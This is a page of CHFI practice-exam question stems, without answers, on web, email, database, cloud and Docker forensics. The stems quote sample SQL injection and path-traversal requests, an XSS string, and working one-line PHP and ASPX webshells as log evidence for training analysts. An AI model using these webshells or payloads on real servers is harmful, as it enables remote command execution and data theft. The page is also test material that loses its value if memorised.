Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


Application, Email and Cloud Forensics

Practice CHFI Application, Email and Cloud Forensics questions with full explanations on every answer.

155 questions



All CHFI Application, Email and Cloud Forensics questions (155)


1

A security analyst reviews an Apache access log entry: 192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0". What type of attack is MOST likely indicated?

2

During an investigation, an analyst extracts email headers from a suspicious email. The header includes: Received: from mail.attacker.com (192.168.1.100); DKIM-Signature: v=1; a=rsa-sha256; d=legitbank.com; s=selector1; bh=...; The email claims to be from support@legitbank.com. Which indicator strongly suggests email spoofing?

3

A forensic analyst is examining a Docker container suspected of being used for malicious activities. The container was running an Alpine Linux image and was stopped 2 hours ago. Which of the following is the BEST first step to collect volatile evidence?

4

A cloud forensics investigator is analyzing an incident in AWS. The suspect is alleged to have deleted an S3 bucket. Which AWS service log would contain the DeleteBucket API call details, including the source IP and user identity?

5

Which tool is specifically designed to analyze email headers and track the path an email took across mail servers?

6

An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?

7

A forensic examiner needs to analyze a Microsoft Outlook PST file from a suspect's computer. Which tool is BEST suited to parse and extract emails, attachments, and metadata from the PST file?

8

An organization uses Azure. A security analyst needs to investigate a suspicious login event. Which Azure log contains details about user sign-ins, including IP address, timestamp, and success/failure status?

9

In database forensics, which type of log records every transaction (including INSERT, UPDATE, DELETE) and allows reconstruction of database changes over time?

10

An analyst finds the following in an IIS log: 10.0.0.5, -, 02/15/2024, 14:23:56, GET /../../windows/system32/cmd.exe, 404, 0, 0, 0, Mozilla/4.0. Which attack technique does this log entry represent?

11

During a cloud forensic investigation, the analyst discovers that the suspect used AWS IAM credentials to launch unauthorized EC2 instances. The suspect claims the credentials were stolen. Which log would the analyst examine to determine the source IP address from which the credentials were used?

12

Which of the following is a significant challenge in cloud forensics compared to traditional digital forensics?

13

Which TWO pieces of information can be obtained from an email's Received headers to help trace the email's origin? (Select TWO)

14

Which THREE of the following are common challenges specific to cloud forensics? (Select THREE)

15

Which TWO of the following are indicators of a webshell attack found in web server logs? (Select TWO)

16

An analyst examining Apache access logs finds the following entry: 192.168.1.10 - - [10/Oct/2023:13:55:36 -0400] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5324 "-" "Mozilla/5.0". Which of the following attacks is MOST likely occurring?

17

During a forensic investigation of a suspected data breach, you are asked to analyze email headers to trace the origin of a phishing email. Which header field provides the IP address of the sending SMTP server?

18

A security analyst is investigating a containerized application running on a Docker host. The analyst needs to collect forensic evidence from a stopped container without starting it. Which of the following Docker commands should be used to export the container's filesystem as a tar archive?

19

While investigating a compromised web server, you discover a file named 'shell.php' in the web root. The file contains the following code: <?php system($_GET['cmd']); ?>. Which of the following best describes this file?

20

An incident responder is analyzing AWS CloudTrail logs to determine if an unauthorized user accessed an S3 bucket. Which of the following CloudTrail event fields should be examined to identify the IAM user or role that made the API call?

21

A forensic analyst is examining a Microsoft Outlook PST file as part of an email investigation. Which tool is specifically designed to parse and analyze PST files and extract email metadata?

22

In cloud forensics, one of the major challenges is that data may be stored in multiple jurisdictions with different legal requirements. This challenge is known as:

23

An analyst finds the following entry in an IIS access log: 10.0.0.5, -, 10/10/2023, 14:30:22, W3SVC1, WEB01, 192.168.1.100, 80, GET, /login.aspx, 200, 0, 1234, 567, Mozilla/5.0+. Based on the log format, which field contains the HTTP status code?

24

Which of the following tools is specifically designed to analyze email headers and track the path of an email, providing information about delays and potential spoofing?

25

During a database forensic investigation, you need to review Microsoft SQL Server transaction logs to identify unauthorized data modifications. Which of the following SQL Server functions or commands is used to read the transaction log?

26

An analyst is investigating a possible data exfiltration via email. The analyst notices that the email headers contain a DKIM-Signature field that is invalid. Which of the following does a failed DKIM check indicate?

27

A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?

28

Which TWO of the following are common indicators of a path traversal attack found in web server logs? (Select 2)

29

Which THREE of the following are challenges specific to cloud forensics compared to traditional digital forensics? (Select 3)

30

Which TWO of the following are valid email header fields that can be used to detect email spoofing? (Select 2)

31

An analyst examines the following Apache access log entry: 192.168.1.10 - - [10/Jan/2023:13:45:22 +0000] "GET /search.php?q=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0". Which attack is MOST likely indicated?

32

During a forensic investigation of a compromised web server, you find the following entry in the IIS log: 192.168.2.50, -, 10/Jan/2023, 14:32:15, W3SVC1, WEB01, 192.168.2.10, 80, POST, /uploads/shell.aspx, 200, 0, 0, 513, 0, Mozilla/4.0. Which action should the investigator prioritize?

33

In a database forensic investigation, you recover a MySQL binary log with the following entry: #230110 13:45:22 server id 1 end_log_pos 123456 Query thread_id=100 exec_time=0 error_code=0 SET TIMESTAMP=1673358322; SELECT * FROM customers INTO OUTFILE '/tmp/export.csv';. What does this indicate?

34

Which tool is specifically designed for parsing and analyzing email headers to trace the origin of an email and detect spoofing?

35

An email header shows the following Received line: Received: from mail.example.com (192.168.1.1) by smtp.server.com (Postfix). The DKIM-Signature header is missing, and the X-Originating-IP header shows an IP address different from the sender's domain MX record. What is the MOST likely conclusion?

36

During a cloud forensic investigation, you review AWS CloudTrail logs and find the following event: {"eventSource":"ec2.amazonaws.com","eventName":"RunInstances","userIdentity":{"arn":"arn:aws:iam::123456789012:user/attacker"},"requestParameters":{"instanceType":"t2.micro","imageId":"ami-0abcdef1234567890"},"responseElements":{"instancesSet":{"items":[{"instanceId":"i-0a1b2c3d4e5f67890"}]}}}. What is the immediate forensic action?

37

In Docker forensics, which command is used to view the command history of a container, including how it was built?

38

A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?

39

Which of the following email headers is used to verify the domain of the sending server and is commonly used for authentication to prevent spoofing?

40

In cloud forensics, which AWS service logs API calls for governance, compliance, and operational auditing, and is the primary source for detecting unauthorized access?

41

During a forensic investigation of a Microsoft SQL Server, you find the transaction log contains the following: LOP_BEGIN_XACT, LOP_INSERT_ROWS, LOP_COMMIT_XACT for a table named 'CreditCards', with a timestamp just before a known data breach. The log also shows a bulk insert operation. What does this indicate?

42

In email forensics, which artifact is stored in Outlook's Personal Folders (.pst) files and can be analyzed using tools like Aid4Mail or EmailTracker?

43

Which TWO of the following are common challenges specific to cloud forensics? (Select TWO)

44

Which THREE of the following are indicators of a webshell in web server logs? (Select THREE)

45

Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)

46

A security analyst reviews an Apache access log and finds the entry: '192.168.1.10 - - [10/Mar/2025:08:12:34 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 2345 "-" "Mozilla/5.0"'. Which attack is indicated?

47

Which email header field is MOST reliable for identifying the true origin of an email, assuming no header tampering occurred at the initial MTA?

48

During a cloud forensic investigation, an analyst discovers that an AWS EC2 instance was used to launch an attack. The instance has been terminated. Which source is MOST likely to contain evidence of the commands executed on the instance?

49

An analyst examining an Outlook PST file wants to recover deleted emails that are no longer visible in the Deleted Items folder. Which technique is MOST effective?

50

A web server log shows the following request: 'GET /../../../../etc/passwd HTTP/1.1' with a 200 response code. The web server is running Apache on Linux. What attack has likely succeeded?

51

Which cloud forensic challenge refers to the inability to physically access the storage media where data resides?

52

A forensic analyst is investigating a Docker container that was used to launch a network attack. The container has been stopped but not removed. Which action should the analyst take FIRST to preserve volatile evidence?

53

An email investigator receives a suspicious email and examines the headers. The 'Received-SPF: pass (google.com: domain of example.com designates 203.0.113.5 as permitted sender)' header is present. However, the 'From' address is 'admin@example.com' and the 'Return-Path' is 'admin@example.com'. What does this indicate?

54

Which tool is specifically designed to analyze email headers and track the path of an email across multiple servers?

55

A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?

56

An analyst discovers a suspicious file named 'cmd.aspx' in the uploads directory of an IIS web server. Analysis reveals the file contains code to execute system commands. What is this file most likely?

57

Which Azure log source should an investigator query to identify who deleted a virtual machine and when?

58

A security analyst is investigating a phishing email and notices the DKIM-Signature header is present but fails validation. Which TWO actions should the analyst take?

59

A cloud forensic investigator is analyzing a GCP audit log entry for a Compute Engine instance. Which THREE fields are essential for identifying the user and operation performed?

60

A forensic analyst is examining a Docker container image for malware. Which TWO techniques can help analyze the image layers?

61

During a forensic investigation of a compromised web server, an analyst examines the Apache access log and finds the following entry: '192.168.1.10 - - [12/Oct/2024:13:45:22 +0000] "GET /index.php?id=1 UNION SELECT username, password FROM users-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. What type of attack is MOST likely indicated?

62

An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?

63

In a Docker container forensics investigation, an analyst needs to examine the file system of a stopped container to look for malicious artifacts. Which command should the analyst run to create a recoverable snapshot of the container's file system without starting the container?

64

A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?

65

An investigator is analyzing a compromised MySQL database server. To determine the exact time and content of a suspect data exfiltration query, which MySQL log should be examined first, assuming it is enabled?

66

A forensic analyst needs to extract email artifacts from a Microsoft Outlook .OST file that is associated with an Exchange account. Which tool is specifically designed to parse and analyze .OST files?

67

During a forensic investigation of a Google Cloud Platform (GCP) environment, an analyst reviews Audit Logs and sees a log entry with the method 'storage.objects.list' and a principal email 'attacker@gmail.com'. However, the identity is not from the organization's domain. What should the analyst conclude?

68

An investigator examines an email header and sees the following: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...'. The email claims to be from 'support@example.com', but the DKIM signature validation fails. Which of the following is the MOST likely cause?

69

Which tool is commonly used to analyze email headers and trace the path of an email across servers by parsing 'Received' fields?

70

In an Azure environment, a forensic analyst needs to identify which user assigned a specific role to another user, leading to privilege escalation. Which Azure log should the analyst examine?

71

An analyst discovers a suspicious file named 'cmd.aspx' in the web root of an IIS server. The file contains ASPX code that executes system commands. The IIS logs show a POST request to '/cmd.aspx' with a 200 status code. Which type of attack is indicated?

72

Which of the following is a primary challenge in cloud forensics due to the shared responsibility model?

73

Which TWO of the following are valid indicators of email spoofing when analyzing email headers?

74

Which THREE of the following are challenges specific to container forensics?

75

Which TWO of the following are appropriate techniques for identifying a webshell on a compromised web server?

76

An analyst reviews an Apache access log entry: '192.168.1.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. Which attack does this log entry most likely indicate?

77

Which email header field is used to verify that an email was sent by the authorized mail server for the domain and has not been tampered with, using cryptographic signatures?

78

A forensic investigator examining a compromised Linux server finds a base64-encoded string in the Apache access log: 'GET /cgi-bin/test.cgi?cmd=ZWNobyAiPD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/PiI+...' After decoding, the string contains a PHP webshell. Which of the following is the MOST effective method to confirm the webshell was executed on the server?

79

During a cloud forensic investigation, an analyst needs to identify who deleted an S3 bucket in an AWS environment. Which AWS service log should the analyst examine to find the API call and the associated IAM user or role?

80

An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?

81

Which tool is specifically designed to extract and analyze metadata from email messages, including headers, attachments, and embedded objects, for forensic investigations?

82

A forensic examiner is investigating a Docker container suspected of being used for malicious activity. Which of the following is the BEST approach to collect volatile evidence from the container without altering its state?

83

During an investigation of a web application breach, an analyst reviews IIS logs and finds numerous entries with status code '200' and URIs containing '?cmd=' followed by encoded strings. The analyst also notices that some requests have a 'User-Agent' string resembling 'Microsoft-CryptoAPI/10.0'. What is the MOST likely conclusion?

84

An investigator needs to analyze a Microsoft Outlook PST file from a suspect's computer. Which of the following tools is specifically designed for parsing and extracting emails, attachments, and metadata from PST files in a forensically sound manner?

85

In the context of cloud forensics, what is the primary challenge associated with volatile evidence in Infrastructure as a Service (IaaS) environments?

86

An analyst is investigating a data exfiltration incident. The MySQL transaction logs show a series of unusual SELECT queries retrieving large amounts of data from the 'customers' table, executed by a user account 'webapp'. What should the analyst check NEXT to determine if the data was actually exfiltrated?

87

A forensic investigator is analyzing a compromised web server. In the Apache access logs, the investigator finds the following request: 'GET /images/../../../etc/passwd HTTP/1.1' with a 200 status code. Which of the following is the MOST likely reason the server returned a 200 (OK) response?

88

A forensic analyst is examining a Google Cloud Platform (GCP) environment after a security incident. Which TWO GCP services should the analyst use to audit API activity and resource changes? (Select TWO.)

89

In an email forensics investigation, which THREE indicators suggest that an email is likely spoofed? (Select THREE.)

90

A security analyst is investigating a potential container escape from a Docker container. Which THREE artifacts should the analyst collect to analyze the incident? (Select THREE.)

91

A security analyst reviews Apache access logs and finds the following entry: `192.168.1.10 - - [12/Jul/2024:10:15:30 -0400] "GET /search.php?q=1' UNION SELECT username,password FROM users-- HTTP/1.1" 200 5321 "-" "Mozilla/5.0"`. Which attack technique is most likely being attempted?

92

During an email forensics investigation, an analyst examines headers and sees `Received: from mail.evil.com (192.168.1.100) by mail.victim.com` followed by `DKIM-Signature: v=1; a=rsa-sha256; d=evil.com; s=selector; bh=...; h=...; b=...`. The email claims to be from support@paypal.com. Which finding is the strongest indicator of spoofing?

93

Which tool is specifically designed to extract and analyze email metadata, including headers, from various email client formats such as PST and OST files?

94

A forensic analyst is investigating a suspected data exfiltration from a MySQL database. Which log source would be MOST useful to identify the exact SQL queries executed, including SELECT statements that retrieved large volumes of data?

95

In an AWS environment, a security analyst detects unusual API calls that created several IAM users with administrative privileges from an unfamiliar IP address. Which AWS service log should be examined first to identify the specific API calls and the IAM user that made them?

96

Which of the following is a unique challenge in cloud forensics compared to traditional digital forensics?

97

During a Docker forensics investigation, an analyst needs to identify the commands executed within a deleted container. Which of the following approaches is MOST effective to retrieve this information?

98

An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?

99

In an email header, which field typically contains the IP address of the original sending client?

100

A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?

101

In a Google Cloud Platform (GCP) environment, a forensic investigator needs to determine who deleted a Cloud Storage bucket and when. Which log type should be queried to obtain this information?

102

Which of the following email authentication protocols uses a digital signature to verify the sender's domain and that the email has not been tampered with?

103

A forensic analyst is examining Azure Activity Logs for signs of privilege escalation. Which TWO of the following activities would be MOST indicative of an attacker attempting to escalate privileges? (Choose two.)

104

During a forensic analysis of a compromised web server, an investigator identifies the following log entries. Which THREE entries are the strongest indicators of a successful web shell upload? (Choose three.)

105

An investigator is analyzing email headers and notices the following: The 'Received' headers show a path through multiple servers, the 'DKIM-Signature' domain matches the sender domain, and 'X-Originating-IP' is present. Which TWO pieces of information are MOST useful to trace the original sender's IP address? (Choose two.)

106

A security analyst reviews the following Apache access log entry: 192.168.1.10 - - [15/May/2025:10:15:23 +0000] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5321 "-" "Mozilla/5.0". Which type of attack is most likely indicated?

107

During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"])).StandardOutput.ReadToEnd(); %>. What is the most likely purpose of this file?

108

In MySQL forensics, which log file is most commonly used to detect unauthorized data exfiltration or changes to database records?

109

Which email header field is specifically used to verify that an email was not tampered with during transit and is signed by the sender's domain?

110

An investigator needs to parse and analyze a Microsoft Outlook personal folders file (.pst). Which tool is specifically designed for this purpose?

111

In cloud forensics, which AWS service provides a centralized log of API calls made by users and services, often used to investigate unauthorized access or configuration changes?

112

A forensic analyst is examining a Docker container that was used to launch a DDoS attack. Which layer of a Docker image is most likely to contain the attacker's malicious scripts?

113

Which of the following is a primary challenge in cloud forensics due to shared infrastructure?

114

An analyst finds the following string in an IIS log: %3Cscript%3Ealert('XSS')%3C/script%3E. What does this indicate?

115

Which tool is specifically designed to extract metadata from email messages, including tracking the route and identifying the originating IP address?

116

In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?

117

Which cloud service's audit logs would an investigator examine to identify who deleted a virtual machine in an Azure subscription?

118

Which TWO of the following are indicators of a webshell on a web server? (Select TWO.)

119

Which THREE of the following are challenges specific to container forensics? (Select THREE.)

120

In email forensics, which TWO of the following headers are most useful for identifying the true origin of an email? (Select TWO.)

121

A security analyst is reviewing Apache access logs and finds the entry: 192.168.1.100 - - [10/Mar/2025:08:12:34 +0000] "GET /search?q=test' OR '1'='1 HTTP/1.1" 200 532. Which attack does this log entry most likely indicate?

122

During an investigation of a suspected data exfiltration, a forensic analyst examines MySQL general query logs and finds a large number of SELECT queries retrieving customer records, followed by DELETE queries. Which of the following is the most likely conclusion?

123

An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?

124

An email forensic analyst receives a suspicious email and wants to trace its origin. Which email header field provides the most reliable information about the IP address of the sending SMTP server?

125

During a cloud forensics investigation of an AWS environment, an analyst extracts CloudTrail logs and notices many events with the error code 'AccessDenied' for a specific IAM user attempting to list an S3 bucket. Which of the following is the most appropriate next step?

126

A forensic analyst is examining Docker container logs and finds a container that ran the command 'rm -rf /' and then stopped. The container was based on a custom image. Which of the following is the most effective way to recover deleted files from the container's filesystem?

127

A forensic analyst is reviewing Microsoft IIS logs and finds the entry: 192.168.1.50, -, 10/Feb/2025:14:22:10 +0000, GET /scripts/..%c1%af../winnt/system32/cmd.exe, 404. Which attack technique is indicated by the encoded characters in the URI?

128

Which of the following tools is specifically designed for parsing and analyzing email headers to detect spoofing and trace the origin of an email?

129

In an Azure environment, an investigator needs to review actions performed by a specific user over the past 30 days. Which Azure service provides the necessary audit logs for this purpose?

130

A forensic analyst is examining a PST file extracted from a suspect's computer. The analyst wants to recover deleted emails that are no longer visible in the Outlook folder hierarchy. Which approach is most effective?

131

Which of the following is a primary challenge in cloud forensics due to the shared responsibility model?

132

During a database forensic investigation, an MSSQL transaction log analysis reveals a series of INSERT statements that added records to a customer table, followed by a TRUNCATE TABLE statement. What does this pattern most likely indicate?

133

A forensic analyst is investigating a web application that was defaced. The Apache access logs show the following entries: (1) GET /cgi-bin/test.cgi HTTP/1.1 with status 200, (2) POST /cgi-bin/test.cgi HTTP/1.1 with status 200, (3) GET /index.html HTTP/1.1 with status 200, (4) GET /images/ HTTP/1.1 with status 301. Which TWO log entries are most suspicious and indicate a likely attack vector?

134. An email investigation reveals that a phishing email was sent from a domain that uses DKIM and SPF. The email headers contain: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...' and 'Received-SPF: pass (example.com: domain of sender@example.com designates 203.0.113.5 as permitted sender)'. Which TWO conclusions can be drawn?

135. A security analyst is investigating a potential data breach in a GCP environment. The analyst reviews the GCP audit logs and finds the following events: (1) A service account was granted the 'roles/storage.objectAdmin' role on a storage bucket containing sensitive data, (2) The service account then listed objects in the bucket, (3) The service account downloaded several objects. Which THREE actions should the analyst take immediately?

136. A security analyst reviewing Apache access logs finds entries like: 192.168.1.10 - - [12/Jan/2023:15:23:11 +0000] "GET /search?q=1' OR '1'='1 HTTP/1.1" 200 5324. What attack is indicated?

137. Which tool is specifically designed to analyze email headers, track the path of an email, and extract metadata such as originating IP and authentication results?

138. During a cloud forensics investigation, an analyst examines AWS CloudTrail logs and finds an event with "userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::123456789012:assumed-role/AdminRole/i-0abcd1234efgh5678"}. What does the 'i-0abcd1234efgh5678' portion most likely represent?

139. An email header contains the following line: "Received: from mail.evil.com (192.0.2.1) by mail.victim.com with ESMTP; Mon, 20 Mar 2023 10:00:00 -0500". The next Received line shows a different IP. What does this indicate?

140. In Docker forensics, which of the following commands would you use to inspect the history of an image, including the commands that created each layer?

141. An investigator needs to recover deleted emails from a Microsoft Outlook PST file. Which forensic technique is most appropriate?

142. A forensic analyst is investigating a webshell on an IIS server. The access.log shows: 10.0.0.5, -, 12/Mar/2023:14:22:10 +0000, POST /uploads/cmd.aspx, 200, 0, 1234. Which log entry is most indicative of webshell activity?

143. Which cloud service log is most appropriate for tracking API calls and resource changes in an AWS environment?

144. A forensic analyst is examining MySQL binary logs to identify a data exfiltration event. Which TWO fields are most critical for reconstructing the stolen data?

145. An Azure Activity Log shows a suspicious 'Delete Virtual Machine' operation from an IP address in a foreign country. Which THREE actions should the forensic investigator take immediately to preserve evidence and assess impact?

146. A security analyst notices repeated entries in an IIS log: 10.0.0.2, -, 05/Feb/2023:08:12:34 +0000, GET /../../windows/system32/config/sam, 404, 0, 532. Which TWO of the following attack types are indicated by this log entry?

147. Which TWO tools are commonly used for email forensic analysis and metadata extraction?

148. A Docker container is suspected of malicious activity. Which THREE data sources should the investigator collect for forensic analysis?

149. A GCP audit log shows a project owner granted 'iam.serviceAccountUser' role to a service account from a different project. Which TWO potential security implications should the investigator prioritize?

150. Which TWO of the following are common challenges specific to cloud forensics?

151. A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?

152. During a forensic investigation of a compromised web server, an analyst finds the following entry in the IIS access log: 192.168.1.5, -, 04/May/2024:14:23:11, GET /scripts/..%5c../windows/system32/cmd.exe, 200. What is the probable attack vector?

153. An email forensic investigator examines a suspicious email and notices the following header: Received: from mail.evil.com (192.168.1.100) by mail.company.com. The DKIM-Signature header fails verification. What does this indicate?

154. Which TWO of the following are common challenges in cloud forensics that are not typically encountered in traditional on-premises forensics?

155. An incident response team is investigating a breach involving a Docker container. Which THREE of the following actions should the team take to preserve forensic evidence?


Frequently asked questions

What does the Application, Email and Cloud Forensics domain cover on the CHFI exam?

The Application, Email and Cloud Forensics domain covers the key concepts tested in this area of the CHFI exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CHFI domains — no account required.

How many Application, Email and Cloud Forensics questions are in the CHFI question bank?

The Courseiva CHFI question bank contains 155 questions in the Application, Email and Cloud Forensics domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Application, Email and Cloud Forensics for CHFI?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Application, Email and Cloud Forensics questions for CHFI?

Yes — the session launcher on this page draws questions exclusively from the Application, Email and Cloud Forensics domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
